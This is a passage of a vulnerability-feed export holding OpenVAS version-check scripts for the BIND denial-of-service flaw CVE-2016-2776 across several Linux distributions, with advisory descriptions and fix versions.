script_tag(name:\"insight\", value:\"A crafted query could crash the BIND name server daemon, leading to a\n denial of service. 
All server roles (authoritative, recursive and forwarding) in default configurations are\n affected.\");\n\n script_tag(name:\"impact\", value:\"An remote attacker may cause a denial of service condition.\");\n\n script_tag(name:\"solution\", value:\"Upgrade to 9.9.9-P3, 9.9.9-S5, 9.10.4-P3, 9.11.0rc3 or later.\");\n\n script_xref(name:\"URL\", value:\"https://kb.isc.org/docs/aa-01419\");\n\n exit(0);\n}\n\ninclude(\"version_func.inc\");\ninclude(\"host_details.inc\");\ninclude(\"revisions-lib.inc\");\n\nif( ! port = get_app_port( cpe:CPE ) ) exit( 0 );\nif( ! infos = get_app_version_and_proto( cpe:CPE, port:port ) ) exit( 0 );\n\nversion = infos[\"version\"];\nproto = infos[\"proto\"];\n\nif (version !~ \"^9\\.\")\n exit(99);\n\nif (version =~ \"^9\\.9\\.[3-9]s[0-9]\") {\n if (version_is_less(version: version, test_version: \"9.9.9s5\")) {\n report = report_fixed_ver(installed_version: version, fixed_version: \"9.9.9-s5\");\n security_message(port: port, data: report, proto: proto);\n exit(0);\n }\n} else {\n if (version_is_less(version: version, test_version: \"9.9.9p3\")) {\n report = report_fixed_ver(installed_version: version, fixed_version: \"9.9.9-p3\");\n security_message(port: port, data: report, proto: proto);\n exit(0);\n }\n\n if (version_in_range(version: version, test_version: \"9.10.0\", test_version2: \"9.10.4p2\")) {\n report = report_fixed_ver(installed_version: version, fixed_version: \"9.10.4-P3\");\n security_message(port: port, data: report, proto: proto);\n exit(0);\n }\n\n if ((revcomp(a: version, b: \"9.11.0a1\") >= 0) && (revcomp(a: version, b: \"9.11.0rc1\") <= 0)) {\n report = report_fixed_ver(installed_version: version, fixed_version: \"9.11.0rc3\");\n security_message(port: port, data: report, proto: proto);\n exit(0);\n }\n}\n\nexit(99);\n", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2019-05-29T18:35:47", "bulletinFamily": "scanner", "cvelist": ["CVE-2016-2776"], "description": "The remote host is 
missing an update for the ", "modified": "2019-03-15T00:00:00", "published": "2016-11-14T00:00:00", "id": "OPENVAS:1361412562310809943", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310809943", "type": "openvas", "title": "Fedora Update for bind FEDORA-2016-2d9825f7c1", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for bind FEDORA-2016-2d9825f7c1\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2016 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.809943\");\n script_version(\"$Revision: 14223 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 14:49:35 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2016-11-14 17:59:56 +0530 (Mon, 14 Nov 2016)\");\n script_cve_id(\"CVE-2016-2776\");\n script_tag(name:\"cvss_base\", value:\"7.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:N/I:N/A:C\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"Fedora Update for bind FEDORA-2016-2d9825f7c1\");\n script_tag(name:\"summary\", value:\"The remote host is 
missing an update for the 'bind'\n package(s) announced via the referenced advisory.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"affected\", value:\"bind on Fedora 24\");\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n script_xref(name:\"FEDORA\", value:\"2016-2d9825f7c1\");\n script_xref(name:\"URL\", value:\"https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/SU2VHQBXQ5XC2UZNI5WA53PQIT5VQ5HG\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2016 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC24\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"FC24\")\n{\n\n if ((res = isrpmvuln(pkg:\"bind\", rpm:\"bind~9.10.4~2.P3.fc24\", rls:\"FC24\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2019-05-29T18:35:37", "bulletinFamily": "scanner", "cvelist": ["CVE-2016-2776"], "description": "The remote host is missing an update for the ", "modified": "2019-03-15T00:00:00", "published": "2016-11-14T00:00:00", "id": "OPENVAS:1361412562310809906", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310809906", "type": "openvas", "title": "Fedora Update for bind99 FEDORA-2016-cca77daf70", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for bind99 FEDORA-2016-cca77daf70\n#\n# Authors:\n# 
System Generated Check\n#\n# Copyright:\n# Copyright (C) 2016 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.809906\");\n script_version(\"$Revision: 14223 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 14:49:35 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2016-11-14 17:59:03 +0530 (Mon, 14 Nov 2016)\");\n script_cve_id(\"CVE-2016-2776\");\n script_tag(name:\"cvss_base\", value:\"7.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:N/I:N/A:C\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"Fedora Update for bind99 FEDORA-2016-cca77daf70\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'bind99'\n package(s) announced via the referenced advisory.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"affected\", value:\"bind99 on Fedora 24\");\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n script_xref(name:\"FEDORA\", value:\"2016-cca77daf70\");\n script_xref(name:\"URL\", 
value:\"https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/RPJKE446DGE76LAXI25N4TS6VZAOMTXE\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2016 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC24\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"FC24\")\n{\n\n if ((res = isrpmvuln(pkg:\"bind99\", rpm:\"bind99~9.9.9~2.P3.fc24\", rls:\"FC24\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2019-05-29T18:35:19", "bulletinFamily": "scanner", "cvelist": ["CVE-2016-2776"], "description": "The remote host is missing an update for the ", "modified": "2018-11-23T00:00:00", "published": "2016-10-05T00:00:00", "id": "OPENVAS:1361412562310871664", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310871664", "type": "openvas", "title": "RedHat Update for bind97 RHSA-2016:1945-01", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# RedHat Update for bind97 RHSA-2016:1945-01\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2016 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even 
the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.871664\");\n script_version(\"$Revision: 12497 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-11-23 09:28:21 +0100 (Fri, 23 Nov 2018) $\");\n script_tag(name:\"creation_date\", value:\"2016-10-05 15:43:18 +0530 (Wed, 05 Oct 2016)\");\n script_cve_id(\"CVE-2016-2776\");\n script_tag(name:\"cvss_base\", value:\"7.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:N/I:N/A:C\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"RedHat Update for bind97 RHSA-2016:1945-01\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'bind97'\n package(s) announced via the referenced advisory.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"insight\", value:\"The Berkeley Internet Name Domain (BIND)\nis an implementation of the Domain Name System (DNS) protocols. BIND includes a\nDNS server (named) a resolver library (routines for applications to use when\ninterfacing with DNS) and tools for verifying that the DNS server is operating\ncorrectly.\n\nSecurity Fix(es):\n\n * A denial of service flaw was found in the way BIND constructed a response\nto a query that met certain criteria. A remote attacker could use this flaw\nto make named exit unexpectedly with an assertion failure via a specially\ncrafted DNS request packet. 
(CVE-2016-2776)\n\nRed Hat would like to thank ISC for reporting this issue.\");\n script_tag(name:\"affected\", value:\"bind97 on\n Red Hat Enterprise Linux (v. 5 server)\");\n script_tag(name:\"solution\", value:\"Please Install the Updated Packages.\");\n\n script_xref(name:\"RHSA\", value:\"2016:1945-01\");\n script_xref(name:\"URL\", value:\"https://www.redhat.com/archives/rhsa-announce/2016-September/msg00033.html\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2016 Greenbone Networks GmbH\");\n script_family(\"Red Hat Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/rhel\", \"ssh/login/rpms\", re:\"ssh/login/release=RHENT_5\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release) exit(0);\n\nres = \"\";\n\nif(release == \"RHENT_5\")\n{\n\n if ((res = isrpmvuln(pkg:\"bind97\", rpm:\"bind97~9.7.0~21.P2.el5_11.7\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"bind97-chroot\", rpm:\"bind97-chroot~9.7.0~21.P2.el5_11.7\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"bind97-debuginfo\", rpm:\"bind97-debuginfo~9.7.0~21.P2.el5_11.7\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"bind97-devel\", rpm:\"bind97-devel~9.7.0~21.P2.el5_11.7\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"bind97-libs\", rpm:\"bind97-libs~9.7.0~21.P2.el5_11.7\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"bind97-utils\", rpm:\"bind97-utils~9.7.0~21.P2.el5_11.7\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) 
exit(99);\n exit(0);\n}\n", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2019-05-29T18:35:03", "bulletinFamily": "scanner", "cvelist": ["CVE-2016-2776"], "description": "Check the version of bind", "modified": "2019-03-08T00:00:00", "published": "2016-09-29T00:00:00", "id": "OPENVAS:1361412562310882565", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310882565", "type": "openvas", "title": "CentOS Update for bind CESA-2016:1944 centos5", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# CentOS Update for bind CESA-2016:1944 centos5\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2016 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.882565\");\n script_version(\"$Revision: 14058 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-08 14:25:52 +0100 (Fri, 08 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2016-09-29 05:43:22 +0200 (Thu, 29 Sep 2016)\");\n script_cve_id(\"CVE-2016-2776\");\n script_tag(name:\"cvss_base\", value:\"7.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:N/I:N/A:C\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"CentOS Update for bind CESA-2016:1944 centos5\");\n script_tag(name:\"summary\", value:\"Check the version of bind\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"insight\", value:\"The Berkeley Internet Name Domain (BIND)\nis an implementation of the Domain Name System (DNS) protocols. BIND includes\na DNS server (named) a resolver library (routines for applications to use\nwhen interfacing with DNS) and tools for verifying that the DNS server is\noperating correctly.\n\nSecurity Fix(es):\n\n * A denial of service flaw was found in the way BIND constructed a response\nto a query that met certain criteria. A remote attacker could use this flaw\nto make named exit unexpectedly with an assertion failure via a specially\ncrafted DNS request packet. 
(CVE-2016-2776)\n\nRed Hat would like to thank ISC for reporting this issue.\");\n script_tag(name:\"affected\", value:\"bind on CentOS 5\");\n script_tag(name:\"solution\", value:\"Please Install the Updated Packages.\");\n\n script_xref(name:\"CESA\", value:\"2016:1944\");\n script_xref(name:\"URL\", value:\"http://lists.centos.org/pipermail/centos-announce/2016-September/022092.html\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2016 Greenbone Networks GmbH\");\n script_family(\"CentOS Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/centos\", \"ssh/login/rpms\", re:\"ssh/login/release=CentOS5\");\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"CentOS5\")\n{\n\n if ((res = isrpmvuln(pkg:\"bind\", rpm:\"bind~9.3.6~25.P1.el5_11.9\", rls:\"CentOS5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"bind-chroot\", rpm:\"bind-chroot~9.3.6~25.P1.el5_11.9\", rls:\"CentOS5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"bind-devel\", rpm:\"bind-devel~9.3.6~25.P1.el5_11.9\", rls:\"CentOS5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"bind-libbind-devel\", rpm:\"bind-libbind-devel~9.3.6~25.P1.el5_11.9\", rls:\"CentOS5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"bind-libs\", rpm:\"bind-libs~9.3.6~25.P1.el5_11.9\", rls:\"CentOS5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"bind-sdb\", rpm:\"bind-sdb~9.3.6~25.P1.el5_11.9\", rls:\"CentOS5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"bind-utils\", 
rpm:\"bind-utils~9.3.6~25.P1.el5_11.9\", rls:\"CentOS5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"caching-nameserver\", rpm:\"caching-nameserver~9.3.6~25.P1.el5_11.9\", rls:\"CentOS5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2019-05-29T18:35:25", "bulletinFamily": "scanner", "cvelist": ["CVE-2016-2776"], "description": "Check the version of bind", "modified": "2019-03-08T00:00:00", "published": "2016-09-29T00:00:00", "id": "OPENVAS:1361412562310882564", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310882564", "type": "openvas", "title": "CentOS Update for bind CESA-2016:1944 centos7", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# CentOS Update for bind CESA-2016:1944 centos7\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2016 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.882564\");\n script_version(\"$Revision: 14058 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-08 14:25:52 +0100 (Fri, 08 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2016-09-29 05:43:19 +0200 (Thu, 29 Sep 2016)\");\n script_cve_id(\"CVE-2016-2776\");\n script_tag(name:\"cvss_base\", value:\"7.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:N/I:N/A:C\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"CentOS Update for bind CESA-2016:1944 centos7\");\n script_tag(name:\"summary\", value:\"Check the version of bind\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"insight\", value:\"The Berkeley Internet Name Domain (BIND)\nis an implementation of the Domain Name System (DNS) protocols. BIND includes\na DNS server (named) a resolver library (routines for applications to use\nwhen interfacing with DNS) and tools for verifying that the DNS server is\noperating correctly.\n\nSecurity Fix(es):\n\n * A denial of service flaw was found in the way BIND constructed a response\nto a query that met certain criteria. A remote attacker could use this flaw\nto make named exit unexpectedly with an assertion failure via a specially\ncrafted DNS request packet. 
(CVE-2016-2776)\n\nRed Hat would like to thank ISC for reporting this issue.\");\n script_tag(name:\"affected\", value:\"bind on CentOS 7\");\n script_tag(name:\"solution\", value:\"Please Install the Updated Packages.\");\n\n script_xref(name:\"CESA\", value:\"2016:1944\");\n script_xref(name:\"URL\", value:\"http://lists.centos.org/pipermail/centos-announce/2016-September/022097.html\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2016 Greenbone Networks GmbH\");\n script_family(\"CentOS Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/centos\", \"ssh/login/rpms\", re:\"ssh/login/release=CentOS7\");\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"CentOS7\")\n{\n\n if ((res = isrpmvuln(pkg:\"bind\", rpm:\"bind~9.9.4~29.el7_2.4\", rls:\"CentOS7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"bind-chroot\", rpm:\"bind-chroot~9.9.4~29.el7_2.4\", rls:\"CentOS7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"bind-devel\", rpm:\"bind-devel~9.9.4~29.el7_2.4\", rls:\"CentOS7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"bind-libs\", rpm:\"bind-libs~9.9.4~29.el7_2.4\", rls:\"CentOS7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"bind-libs-lite\", rpm:\"bind-libs-lite~9.9.4~29.el7_2.4\", rls:\"CentOS7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"bind-license\", rpm:\"bind-license~9.9.4~29.el7_2.4\", rls:\"CentOS7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"bind-lite-devel\", rpm:\"bind-lite-devel~9.9.4~29.el7_2.4\", 
rls:\"CentOS7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"bind-pkcs11\", rpm:\"bind-pkcs11~9.9.4~29.el7_2.4\", rls:\"CentOS7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"bind-pkcs11-devel\", rpm:\"bind-pkcs11-devel~9.9.4~29.el7_2.4\", rls:\"CentOS7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"bind-pkcs11-libs\", rpm:\"bind-pkcs11-libs~9.9.4~29.el7_2.4\", rls:\"CentOS7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"bind-pkcs11-utils\", rpm:\"bind-pkcs11-utils~9.9.4~29.el7_2.4\", rls:\"CentOS7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"bind-sdb\", rpm:\"bind-sdb~9.9.4~29.el7_2.4\", rls:\"CentOS7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"bind-sdb-chroot\", rpm:\"bind-sdb-chroot~9.9.4~29.el7_2.4\", rls:\"CentOS7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"bind-utils\", rpm:\"bind-utils~9.9.4~29.el7_2.4\", rls:\"CentOS7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2020-03-17T22:56:33", "bulletinFamily": "scanner", "cvelist": ["CVE-2016-2776"], "description": "The remote host is missing an update announced via the referenced Security Advisory.", "modified": "2020-03-13T00:00:00", "published": "2016-10-26T00:00:00", "id": "OPENVAS:1361412562310120740", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310120740", "type": "openvas", "title": "Amazon Linux: Security Advisory (ALAS-2016-751)", "sourceData": "# Copyright (C) 2016 Greenbone Networks GmbH\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) of their respective author(s)\n#\n# 
SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.120740\");\n script_version(\"2020-03-13T13:19:50+0000\");\n script_tag(name:\"creation_date\", value:\"2016-10-26 15:38:26 +0300 (Wed, 26 Oct 2016)\");\n script_tag(name:\"last_modification\", value:\"2020-03-13 13:19:50 +0000 (Fri, 13 Mar 2020)\");\n script_name(\"Amazon Linux: Security Advisory (ALAS-2016-751)\");\n script_tag(name:\"insight\", value:\"A denial of service flaw was found in the way BIND constructed a response to a query that met certain criteria. 
A remote attacker could use this flaw to make named exit unexpectedly with an assertion failure via a specially crafted DNS request packet.\");\n script_tag(name:\"solution\", value:\"Run yum update bind to update your system.\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name:\"URL\", value:\"https://alas.aws.amazon.com/ALAS-2016-751.html\");\n script_cve_id(\"CVE-2016-2776\");\n script_tag(name:\"cvss_base\", value:\"7.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:N/I:N/A:C\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/amazon_linux\", \"ssh/login/release\");\n script_category(ACT_GATHER_INFO);\n script_tag(name:\"summary\", value:\"The remote host is missing an update announced via the referenced Security Advisory.\");\n script_copyright(\"Copyright (C) 2016 Greenbone Networks GmbH\");\n script_family(\"Amazon Linux Local Security Checks\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\nreport = \"\";\n\nif(release == \"AMAZON\") {\n if(!isnull(res = isrpmvuln(pkg:\"bind-libs\", rpm:\"bind-libs~9.8.2~0.37.rc1.48.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"bind-debuginfo\", rpm:\"bind-debuginfo~9.8.2~0.37.rc1.48.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"bind-sdb\", rpm:\"bind-sdb~9.8.2~0.37.rc1.48.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"bind-utils\", rpm:\"bind-utils~9.8.2~0.37.rc1.48.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"bind\", rpm:\"bind~9.8.2~0.37.rc1.48.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"bind-devel\", rpm:\"bind-devel~9.8.2~0.37.rc1.48.amzn1\", rls:\"AMAZON\"))) 
